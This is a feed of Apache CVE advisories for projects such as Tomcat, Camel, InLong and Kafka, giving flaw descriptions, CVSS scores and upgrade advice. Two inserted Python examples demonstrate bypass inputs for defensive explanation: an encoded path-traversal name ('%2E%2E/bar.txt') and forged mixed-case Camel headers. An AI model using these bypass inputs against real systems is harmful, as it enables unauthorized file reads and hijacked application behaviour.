134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache ambari *
CVE-2025-23408

Weak Password Requirements vulnerability in Apache Fineract. This issue affects Apache Fineract: through 1.10.1. The issue is fixed in version 1.11.0. Users are encouraged to upgrade to version 1.13.0, the latest release.

Products Affected

Vendor Product Version
apache fineract *
CVE-2025-24404

XML injection leading to RCE when parsing an HTTP sitemap XML response in Apache HertzBeat. The attacker needs an authenticated account with access and must add a monitor whose response is parsed as XML; specially crafted returned content can then trigger the XML parsing vulnerability. This issue affects Apache HertzBeat (incubating): before 1.7.0. Users are recommended to upgrade to version 1.7.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2025-24783

** UNSUPPORTED WHEN ASSIGNED ** Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG) vulnerability in Apache Cocoon. This issue affects Apache Cocoon: all versions. When a continuation is created, it gets a random identifier. Because the random number generator used to generate these identifiers was seeded with the startup time, it may not have been sufficiently unpredictable, and an attacker could use this to guess continuation ids and look up continuations they should not have had access to. As a mitigation, you may enable the "session-bound-continuations" option to make sure continuations are not shared across sessions. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache cocoon *
CVE-2025-24813

Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected.
If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files:
- writes enabled for the default servlet (disabled by default)
- support for partial PUT (enabled by default)
- a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads
- attacker knowledge of the names of security sensitive files being uploaded
- the security sensitive files also being uploaded via partial PUT
If all of the following were true, a malicious user was able to perform remote code execution:
- writes enabled for the default servlet (disabled by default)
- support for partial PUT (enabled by default)
- application was using Tomcat's file based session persistence with the default storage location
- application included a library that may be leveraged in a deserialization attack
Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.99, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 11.0.0
apache tomcat 9.0.0
netapp bootstrap_os -
debian debian_linux 11.0
CVE-2025-24814

Core creation allows users to replace "trusted" configset files with arbitrary configuration. Solr instances that (1) use the "FileSystemConfigSetService" component (the default in "standalone" or "user-managed" mode), and (2) are running without authentication and authorization, are vulnerable to a sort of privilege escalation wherein individual "trusted" configset files can be ignored in favor of potentially-untrusted replacements available elsewhere on the filesystem. These replacement config files are treated as "trusted" and can use "<lib>" tags to add to Solr's classpath, which an attacker might use to load malicious code as a searchComponent or other plugin. This issue affects all Apache Solr versions up through Solr 9.7. Users can protect against the vulnerability by enabling authentication and authorization on their Solr clusters or switching to SolrCloud (and away from "FileSystemConfigSetService"). Users are also recommended to upgrade to Solr 9.8.0, which mitigates this issue by disabling use of "<lib>" tags by default.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache solr *
CVE-2025-24853

A carefully crafted request when creating a header link using the wiki markup syntax could allow the attacker to execute JavaScript in the victim's browser and obtain some sensitive information about the victim. Further research by the JSPWiki team showed that the markdown parser allowed this kind of attack too. Apache JSPWiki users should upgrade to 2.12.3 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2025-24854

A carefully crafted request using the Image plugin could trigger an XSS vulnerability on Apache JSPWiki, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.12.3 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2025-24859

A session management vulnerability exists in Apache Roller before version 6.1.5 where active user sessions are not properly invalidated after password changes. When a user's password is changed, either by the user themselves or by an administrator, existing sessions remain active and usable. This allows continued access to the application through old sessions even after password changes, potentially enabling unauthorized access if credentials were compromised. This issue affects Apache Roller versions up to and including 6.1.4. The vulnerability is fixed in Apache Roller 6.1.5 by implementing centralized session management that properly invalidates all active sessions when passwords are changed or users are disabled.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache roller *
CVE-2025-24860

Incorrect Authorization vulnerability in Apache Cassandra allowing users to access a datacenter or IP/CIDR groups they should not be able to when using CassandraNetworkAuthorizer or CassandraCIDRAuthorizer. Users with restricted data center access can update their own permissions via data control language (DCL) statements on affected versions. This issue affects Apache Cassandra: from 4.0.0 through 4.0.15 and from 4.1.0 through 4.1.7 for CassandraNetworkAuthorizer, and from 5.0.0 through 5.0.2 for both CassandraNetworkAuthorizer and CassandraCIDRAuthorizer. Operators using CassandraNetworkAuthorizer or CassandraCIDRAuthorizer on affected versions should review data access rules for potential breaches. Users are recommended to upgrade to versions 4.0.16, 4.1.8, 5.0.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache cassandra *
CVE-2025-25069

A Cross-Protocol Scripting vulnerability is found in Apache Kvrocks. Since Kvrocks didn't detect whether "Host:" or "POST" appears in RESP requests, a valid HTTP request can also be sent to Kvrocks as a valid RESP request and trigger some database operations, which can be dangerous when chained with SSRF. It is similar to CVE-2016-10517 in Redis. This issue affects Apache Kvrocks: from the initial version to the latest version 2.11.0. Users are recommended to upgrade to version 2.11.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache kvrocks *
CVE-2025-25247

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Felix Webconsole. This issue affects Apache Felix Webconsole 4.x up to 4.9.8 and 5.x up to 5.0.8. Users are recommended to upgrade to version 4.9.10 or 5.0.10 or higher, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache felix_webconsole *
CVE-2025-26413

Improper Input Validation vulnerability in Apache Kvrocks. The SETRANGE command didn't check whether the `offset` input is a positive integer before using it as an index into a string, so the server crashes because the index is out of range. This issue affects Apache Kvrocks: through 2.11.1. Users are recommended to upgrade to version 2.12.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache kvrocks *
CVE-2025-26467

Privilege Defined With Unsafe Actions vulnerability in Apache Cassandra. A user with MODIFY permission ON ALL KEYSPACES can escalate privileges to superuser within a targeted Cassandra cluster via unsafe actions to a system resource. Operators granting data MODIFY permission on all keyspaces on affected versions should review data access rules for potential breaches. This issue affects Apache Cassandra 3.0.30, 3.11.17, 4.0.16, 4.1.7, 5.0.2, but this advisory is only for 4.0.16 because the fix for CVE-2025-23015 was incorrectly applied to 4.0.16, so that version is still affected. Users in the 4.0 series are recommended to upgrade to version 4.0.17, which fixes the issue. Users of the 3.0, 3.11, 4.1 and 5.0 series should follow the recommendation from CVE-2025-23015.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache cassandra *
CVE-2025-26521

When an Apache CloudStack user-account creates a CKS-based Kubernetes cluster in a project, the API key and the secret key of the 'kubeadmin' user of the caller account are used to create the secret config in the CKS-based Kubernetes cluster. A member of the project who can access the CKS-based Kubernetes cluster can also access the API key and secret key of the 'kubeadmin' user of the CKS cluster creator's account. An attacker who is a member of the project can exploit this to impersonate and perform privileged actions that can result in complete compromise of the confidentiality, integrity, and availability of resources owned by the creator's account. CKS users are recommended to upgrade to version 4.19.3.0 or 4.20.1.0, which fixes this issue.

Updating Existing Kubernetes Clusters in Projects

A service account should be created for each project to provide limited access specifically for Kubernetes cluster providers and autoscaling. Follow the steps below to create a new service account, update the secret inside the cluster, and regenerate existing API and service keys:

1. Create a New Service Account
Create a new account using the role "Project Kubernetes Service Role" with the following details:
    Account Name: kubeadmin-<FIRST_EIGHT_CHARACTERS_OF_PROJECT_ID>
    First Name: Kubernetes
    Last Name: Service User
    Account Type: 0 (Normal User)
    Role ID: <ID_OF_SERVICE_ROLE>

2. Add the Service Account to the Project
Add this account to the project where the Kubernetes cluster(s) are hosted.

3. Generate API and Secret Keys
Generate an API Key and Secret Key for the default user of this account.

4. Update the CloudStack Secret in the Kubernetes Cluster
Create a temporary file `/tmp/cloud-config` with the following data:
    api-url = <API_URL>     # For example: <MS_URL>/client/api
    api-key = <SERVICE_USER_API_KEY>
    secret-key = <SERVICE_USER_SECRET_KEY>
    project-id = <PROJECT_ID>
Delete the existing secret using kubectl and the Kubernetes cluster config:
    ./kubectl --kubeconfig kube.conf -n kube-system delete secret cloudstack-secret
Create a new secret using kubectl and the Kubernetes cluster config:
    ./kubectl --kubeconfig kube.conf -n kube-system create secret generic cloudstack-secret --from-file=/tmp/cloud-config
Remove the temporary file:
    rm /tmp/cloud-config

5. Regenerate API and Secret Keys
Regenerate the API and secret keys for the original user account that was used to create the Kubernetes cluster.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2025-26795

Exposure of Sensitive Information to an Unauthorized Actor, Insertion of Sensitive Information into Log File vulnerability in Apache IoTDB JDBC driver. This issue affects iotdb-jdbc: from 0.10.0 through 1.3.3, from 2.0.1-beta before 2.0.2. Users are recommended to upgrade to version 2.0.2 and 1.3.4, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache iotdb *
CVE-2025-26864

Exposure of Sensitive Information to an Unauthorized Actor, Insertion of Sensitive Information into Log File vulnerability in the OpenIdAuthorizer of Apache IoTDB. This issue affects Apache IoTDB: from 0.10.0 through 1.3.3, from 2.0.1-beta before 2.0.2. Users are recommended to upgrade to version 1.3.4 and 2.0.2, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache iotdb *
apache iotdb 2.0.1
CVE-2025-26865

Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz. This issue affects Apache OFBiz: from 18.12.17 before 18.12.18. It is a regression introduced between the 18.12.17 and 18.12.18 releases, so only unreleased builds taken from that interval are affected; running such builds is not recommended, and for security only official releases should be used. In other words, 18.12.17 itself is not affected, but a build from between 18.12.17 and 18.12.18 is. Users running such a build are recommended to upgrade to version 18.12.18, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 3.5 LOW CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.9 2.5

Products Affected

Vendor Product Version
apache ofbiz 18.12.17
CVE-2025-26866

A remote code execution vulnerability exists in Apache HugeGraph: a malicious Raft node can exploit insecure Hessian deserialization within the PD store. The fix enforces IP-based authentication to restrict cluster membership and implements a strict class whitelist to harden Hessian deserialization against object injection attacks. Users are recommended to upgrade to version 1.7.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hugegraph *
CVE-2025-27017

Apache NiFi 1.13.0 through 2.2.0 includes the username and password used to authenticate with MongoDB in the NiFi provenance events that MongoDB components generate during processing. An authorized user with read access to the provenance events of those processors may see the credentials information. Upgrading to Apache NiFi 2.3.0 is the recommended mitigation, which removes the credentials from provenance event records.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache nifi *
CVE-2025-27018

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Airflow MySQL Provider. When a user triggered a DAG that used the dump_sql or load_sql functions, they could pass a table parameter from the UI that was interpolated into the SQL statement, causing SQL injection by running SQL that was not intended. It could lead to data corruption, modification and other effects. This issue affects Apache Airflow MySQL Provider: before 6.2.0. Users are recommended to upgrade to version 6.2.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache apache-airflow-providers-mysql *
CVE-2025-27391

Insertion of Sensitive Information into Log File vulnerability in Apache ActiveMQ Artemis. All the values of the broker properties are logged when the org.apache.activemq.artemis.core.config.impl.ConfigurationImpl logger has the debug level enabled. This issue affects Apache ActiveMQ Artemis: from 1.5.1 before 2.40.0. It can be mitigated by restricting log access to only trusted users. Users are recommended to upgrade to version 2.40.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache activemq_artemis *
CVE-2025-27427

A vulnerability exists in Apache ActiveMQ Artemis whereby a user with the createDurableQueue or createNonDurableQueue permission on an address can augment the routing-type supported by that address even if said user doesn't have the createAddress permission for that particular address. When combined with the send permission and automatic queue creation a user could successfully send a message with a routing-type not supported by the address when that message should actually be rejected on the basis that the user doesn't have permission to change the routing-type of the address. This issue affects Apache ActiveMQ Artemis from 2.0.0 through 2.39.0. Users are recommended to upgrade to version 2.40.0 which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache activemq_artemis *
CVE-2025-27446

Incorrect Permission Assignment for Critical Resource vulnerability in Apache APISIX(java-plugin-runner). Local listening file permissions in APISIX plugin runner allow a local attacker to elevate privileges. This issue affects Apache APISIX(java-plugin-runner): from 0.2.0 through 0.5.0. Users are recommended to upgrade to version 0.6.0 or higher, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache apisix *
CVE-2025-27522

Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.13.0 through 2.1.0. This vulnerability is a bypass of the fix for CVE-2024-26579. Users are advised to upgrade to Apache InLong 2.2.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/11732

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache inlong *
CVE-2025-27526

Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.13.0 through 2.1.0. The checks applied to InLong JDBC URLs can be bypassed using URL encoding and backspace characters. Users are advised to upgrade to Apache InLong 2.2.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/11747

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache inlong *
CVE-2025-27528

Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.13.0 through 2.1.0. This vulnerability allows attackers to bypass the security mechanisms of InLong JDBC and leads to arbitrary file reading. Users are advised to upgrade to Apache InLong's 2.2.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/11747

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache inlong *
CVE-2025-27531

Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.13.0 before 2.1.0. It allows an authenticated attacker to read arbitrary files by supplying the parameter twice ("double writing" the param). Users are recommended to upgrade to version 2.1.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache inlong *
CVE-2025-27533

Memory Allocation with Excessive Size Value vulnerability in Apache ActiveMQ. During unmarshalling of OpenWire commands the size value of buffers was not properly validated, which could lead to excessive memory allocation and be exploited to cause a denial of service (DoS) by depleting process memory, thereby affecting applications and services that rely on the availability of the ActiveMQ broker when not using mutual TLS connections. This issue affects Apache ActiveMQ: from 6.0.0 before 6.1.6, from 5.18.0 before 5.18.7, from 5.17.0 before 5.17.7, before 5.16.8. ActiveMQ 5.19.0 is not affected. Users are recommended to upgrade to version 6.1.6, 5.19.0, 5.18.7, 5.17.7 or 5.16.8 (or later), which fix the issue. Existing users may implement mutual TLS to mitigate the risk on affected brokers.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache activemq *
CVE-2025-27553

Relative Path Traversal vulnerability in Apache Commons VFS before 2.10.0. The FileObject API in Commons VFS has a 'resolveFile' method that takes a 'scope' parameter. Specifying 'NameScope.DESCENDENT' promises that "an exception is thrown if the resolved file is not a descendent of the base file". However, when the path contains encoded ".." characters (for example, "%2E%2E/bar.txt"), it might return file objects that are not a descendent of the base file, without throwing an exception. This issue affects Apache Commons VFS: before 2.10.0. Users are recommended to upgrade to version 2.10.0, which fixes the issue.
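The advisory above describes a descendant check that sees "%2E%2E" as an ordinary directory name while a lower layer later decodes it to "..". The following is an added example, not Apache Commons VFS code: a minimal model of the vulnerable check beside a hardened one that decodes to a fixed point before normalising. Paths are POSIX strings and the base directory is an assumption.

```python
"""Descendant check before and after percent-decoding, modelled on
CVE-2025-27553.  Added example; not Apache Commons VFS code."""

from posixpath import normpath
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 5


def is_descendant(base, path):
    """True if the normalised path lies at or below base."""
    base, path = normpath(base), normpath(path)
    return path == base or path.startswith(base + "/")


def naive_resolve(base, name):
    """Vulnerable variant: checks the raw name.  '%2E%2E' is just an
    odd directory name here, so the check passes."""
    resolved = normpath(base + "/" + name)
    if not is_descendant(base, resolved):
        raise ValueError("not a descendant: " + name)
    return resolved


def physical_path(resolved):
    """What a lower layer that decodes percent-escapes would open."""
    return normpath(unquote(resolved))


def fully_decode(name):
    """Decode until the string stops changing (bounded, so '%2525...'
    chains cannot spin forever)."""
    decoded = name
    for _ in range(MAX_DECODE_ROUNDS):
        nxt = unquote(decoded)
        if nxt == decoded:
            return decoded
        decoded = nxt
    raise ValueError("too many encoding layers: " + name)


def safe_resolve(base, name):
    """Hardened variant: decode first, then normalise and check, so
    '..' cannot hide behind one or more layers of encoding."""
    decoded = fully_decode(name)
    if "\x00" in decoded:
        raise ValueError("NUL in name")
    resolved = normpath(base + "/" + decoded)
    if not is_descendant(base, resolved):
        raise ValueError("not a descendant: " + name)
    return resolved


def rejects(base, name):
    """Convenience: does safe_resolve refuse this name?"""
    try:
        safe_resolve(base, name)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    base = "/srv/files"                      # assumed base directory
    r = naive_resolve(base, "%2E%2E/bar.txt")
    print(r, "->", physical_path(r), is_descendant(base, physical_path(r)))
    print(rejects(base, "%2E%2E/bar.txt"), rejects(base, "%252E%252E/bar.txt"))
```

The order matters: normalise-then-decode leaves the door open, decode-then-normalise closes it. A literal "%" that survives decoding (for example in "100%.txt") is left alone, so ordinary names still resolve.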

Products Affected

Vendor Product Version
apache commons_vfs *
CVE-2025-27555

Airflow versions before 2.11.1 have a vulnerability that allows authenticated users with audit log access to see sensitive values in audit logs which they should not see. When sensitive connection parameters were set via airflow CLI, values of those variables appeared in the audit log and were stored unencrypted in the Airflow database. While this risk is limited to users with audit log access, it is recommended to upgrade to Airflow 2.11.1 or a later version, which addresses this issue. Users who previously used the CLI to set connections should manually delete entries with those connection sensitive values from the log table. This is similar but not the same issue as CVE-2024-50378

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2025-27636

Bypass/Injection vulnerability in Apache Camel components under particular conditions. This issue affects Apache Camel: from 4.10.0 through 4.10.1, from 4.8.0 through 4.8.4, from 3.10.0 through 3.22.3. Users are recommended to upgrade to version 4.10.2 for 4.10.x LTS, 4.8.5 for 4.8.x LTS and 3.22.4 for 3.x releases.

This vulnerability is present in Camel's default incoming header filter, which allows an attacker to include Camel-specific headers that, for some Camel components, can alter behaviour. For example, the camel-bean component can be made to call a different method on the bean than the one coded in the application. In the camel-jms component, a malicious header can be used to send the message to a different queue (on the same broker) than the one coded in the application. The same effect can be seen with the camel-exec component. The attacker needs a way to inject custom headers, such as an HTTP request. So if you have Camel applications that are directly connected to the internet via HTTP, an attacker could include malicious HTTP headers in the requests sent to the Camel application. All the known Camel HTTP components, such as camel-servlet, camel-jetty, camel-undertow, camel-platform-http and camel-netty-http, are vulnerable out of the box. Under these conditions an attacker could forge a Camel header name and make the bean component invoke other methods in the same bean.

The components that use the default header filter strategy are: camel-activemq, camel-activemq6, camel-amqp, camel-aws2-sqs, camel-azure-servicebus, camel-cxf-rest, camel-cxf-soap, camel-http, camel-jetty, camel-jms, camel-kafka, camel-knative, camel-mail, camel-nats, camel-netty-http, camel-platform-http, camel-rest, camel-sjms, camel-spring-rabbitmq, camel-stomp, camel-tahu, camel-undertow and camel-xmpp.

The vulnerability arises from a bug in the default filtering mechanism, which only blocks headers starting with "Camel", "camel" or "org.apache.camel." and compares them case-sensitively, so spellings such as "cAmel" or "cAMEL" pass through.

Mitigation: you can work around this in your Camel applications by removing such headers in your Camel routes, either globally or per route. For example, use the removeHeaders EIP to filter out anything like "cAmel", "cAMEL" etc., or in general every header not starting with "Camel", "camel" or "org.apache.camel.".
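To make the bypass concrete, here is an added example (not Apache Camel code) that models the case-sensitive prefix filter described above beside a case-insensitive one. The header names in the constructed request are assumptions for illustration; the bypass relies on Camel treating header names case-insensitively once they are inside the exchange, so a surviving "cAmel..." header is looked up as if it were the real one.

```python
"""Case-sensitive vs. case-insensitive filtering of inbound headers,
modelled on CVE-2025-27636.  Added example; not Apache Camel code."""

# Prefixes the advisory says the default filter rejected.
BLOCKED_PREFIXES = ("Camel", "camel", "org.apache.camel.")
_LOWERED = tuple(p.lower() for p in BLOCKED_PREFIXES)


def vulnerable_filter(headers):
    """Drop headers whose name starts with a blocked prefix, using the
    case-sensitive comparison that let 'cAmel...' names through."""
    return {name: value for name, value in headers.items()
            if not name.startswith(BLOCKED_PREFIXES)}


def hardened_filter(headers):
    """Same policy, compared case-insensitively: what the advisory's
    removeHeaders workaround has to achieve."""
    return {name: value for name, value in headers.items()
            if not name.lower().startswith(_LOWERED)}


def forged_internal_headers(headers):
    """Names that survived filtering yet spell a Camel prefix once case
    is ignored: exactly the headers an attacker can smuggle in."""
    return sorted(n for n in headers if n.lower().startswith(_LOWERED))


# Constructed inbound HTTP request headers.  HTTP header names are
# case-insensitive, so a client may send any spelling it likes.
INBOUND = {
    "Content-Type": "application/json",
    "CamelHttpPath": "/orders",                # blocked by both filters
    "cAmelBeanMethodName": "purgeAllOrders",   # forged; assumed name
    "ORG.APACHE.CAMEL.Foo": "x",               # forged; assumed name
}

if __name__ == "__main__":
    print("vulnerable filter keeps:", forged_internal_headers(vulnerable_filter(INBOUND)))
    print("hardened filter keeps:  ", forged_internal_headers(hardened_filter(INBOUND)))
```

The same idea applies whether the filter lives in Camel's header filter strategy or in a removeHeaders step in the route: the comparison must be case-insensitive, or an attacker simply picks a spelling the filter does not recognise.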

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.6 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L 2.2 3.4

Products Affected

Vendor Product Version
apache camel *
CVE-2025-27696

Incorrect Authorization vulnerability in Apache Superset allows ownership takeover of dashboards, charts or datasets by authenticated users with read permissions. This issue affects Apache Superset: through 4.1.1. Users are recommended to upgrade to version 4.1.2 or above, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache superset *
CVE-2025-27817

A possible arbitrary file read and SSRF vulnerability has been identified in Apache Kafka Client. Apache Kafka Clients accept configuration data for setting up the SASL/OAUTHBEARER connection with the brokers, including "sasl.oauthbearer.token.endpoint.url" and "sasl.oauthbearer.jwks.endpoint.url". Apache Kafka allows clients to read an arbitrary file and return the content in the error log, or to send requests to an unintended location. In applications where Apache Kafka Clients configurations can be specified by an untrusted party, attackers may use the "sasl.oauthbearer.token.endpoint.url" and "sasl.oauthbearer.jwks.endpoint.url" configuration to read arbitrary contents of the disk and environment variables or make requests to an unintended location. In particular, this flaw may be used in Apache Kafka Connect to escalate from REST API access to filesystem/environment/URL access, which may be undesirable in certain environments, including SaaS products. Since Apache Kafka 3.9.1/4.0.0, a system property ("-Dorg.apache.kafka.sasl.oauthbearer.allowed.urls") has been added to set the allowed URLs in SASL JAAS configuration. In 3.9.1 it accepts all URLs by default for backward compatibility. In 4.0.0 and newer, however, the default value is an empty list and users have to set the allowed URLs explicitly.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
